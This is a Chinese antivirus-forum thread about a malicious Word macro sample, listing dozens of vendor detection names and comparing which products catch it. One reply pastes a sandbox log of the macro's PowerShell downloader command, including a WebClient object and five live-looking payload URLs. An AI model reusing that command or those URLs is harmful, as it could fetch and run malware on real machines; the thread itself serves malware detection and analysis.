楼主: 温馨小屋
收起左侧

[病毒样本] word病毒一只

  [复制链接]
松竹承茂
发表于 2018-12-8 22:33:42 | 显示全部楼层
本帖最后由 松竹承茂 于 2018-12-8 22:34 编辑

Ad-Aware
W97M.Downloader.HQS

AegisLab
Trojan.MSWord.Generic.4!c

AhnLab-V3
DOC/Downloader

Antiy-AVL
Trojan[Downloader]/MSOffice.Agent.cl

Arcabit
HEUR.VBA.Trojan.e

Avast
Other:Malware-gen [Trj]

AVG
Other:Malware-gen [Trj]

Avira
W97M/Agent.75026267

Baidu
VBA.Trojan-Downloader.Agent.dvm

BitDefender
W97M.Downloader.HQS

CAT-QuickHeal
W97M.Emotet.Heur

ClamAV
Doc.Malware.Generic-6775854-0

Cyren
W97M/Downldr

DrWeb
Exploit.Siggen.16526

Emsisoft
W97M.Downloader.HQS (B)

Endgame
malicious (high confidence)

eScan
W97M.Downloader.HQS

ESET-NOD32
VBA/TrojanDownloader.Agent.LRB

F-Prot
New or modified W97M/Downldr

F-Secure
W97M.Downloader.HQS

Fortinet
VBA/Agent.F78E!tr.dldr

GData
Macro.Trojan-Downloader.Shallow.S

Ikarus
Trojan.VBA.Agent

Kaspersky
HEUR:Trojan-Downloader.MSOffice.SLoad.gen

McAfee
W97M/Downloader.gg

McAfee-GW-Edition
BehavesLike.Downloader.lg

Microsoft
Trojan:O97M/Obfuse.BZ

NANO-Antivirus
Trojan.Ole2.Vbs-heuristic.druvzi

Qihoo-360
virus.office.qexvmc.1080

SentinelOne
static engine - malicious

Sophos AV
Troj/DocDl-QZA

Symantec
W97M.Downloader

TACHYON
Suspicious/W97M.Obfus.Gen.6

Tencent
Heur.Macro.Generic.Gen.h

TrendMicro-HouseCall
Trojan.W97M.POWLOAD.TIHAOHAS

ZoneAlarm
HEUR:Trojan-Downloader.MSOffice.SLoad.gen

Zoner
Probably W97Obfuscated

松竹承茂
发表于 2018-12-8 22:35:30 | 显示全部楼层
www-tekeze 发表于 2018-12-8 22:32
火绒miss,智量kill 。

质量是修复还是删除
www-tekeze
发表于 2018-12-8 22:36:27 | 显示全部楼层
www-tekeze 发表于 2018-12-8 22:32
火绒miss,智量kill 。

默认都不启用宏,启用后有很多powershell动作。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
神算子
发表于 2018-12-8 22:41:28 | 显示全部楼层
松竹承茂 发表于 2018-12-8 22:32
WD采取的也是修复处理

你这个报毒,说这个毒很厉害的样子
www-tekeze
发表于 2018-12-8 23:12:48 | 显示全部楼层
松竹承茂 发表于 2018-12-8 22:35
质量是修复还是删除

不会修复只会删除。。
BE_HC
发表于 2018-12-9 00:05:43 | 显示全部楼层
本帖最后由 BE_HC 于 2018-12-9 00:10 编辑

CCAV MISS
既然是Norton杀的就不测主方了
  1. timestamp="2018-12-08T16:01:15.166Z" id="29" type="CreateProcess" path="C:\Windows\system32\cmd.exe  /S /D /c" echo $mqH='whL';$CYl=new-object Net.WebClient;$dtB='http://transactionmodeling.com/xncsv71ksr@http://tresnexus.com/3y15Yyl4E2@http://wertedits.com/e56PfFq0E@http://tpmeehan.com/pEZRqTUk1@http://mrmclaughlin.com/uXBIMLmWui'.Split('@');$MrF='Xlm';$fGa = '573" cmdline="C:\Windows\system32\cmd.exe  /S /D /c" echo $mqH='whL';$CYl=new-object Net.WebClient;$dtB='http://transactionmodeling.com/xncsv71ksr@http://tresnexus.com/3y15Yyl4E2@http://wertedits.com/e56PfFq0E@http://tpmeehan.com/pEZRqTUk1@http://mrmclaughlin.com/uXBIMLmWui'.Split('@');$MrF='Xlm';$fGa = '573" suspended="1"/>
复制代码
提取到的宏



一些行为(某些详情已经贴出




由宏下载得得文件






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
松竹承茂
发表于 2018-12-9 07:50:58 | 显示全部楼层
神算子 发表于 2018-12-8 22:41
你这个报毒,说这个毒很厉害的样子

心心相印
发表于 2018-12-9 10:09:28 | 显示全部楼层
bd kill
神算子
发表于 2018-12-9 12:36:01 | 显示全部楼层

你这个微软杀毒免费的吧
松竹承茂
发表于 2018-12-9 12:50:12 | 显示全部楼层
神算子 发表于 2018-12-9 12:36
你这个微软杀毒免费的吧

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 16:26 , Processed in 0.109277 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表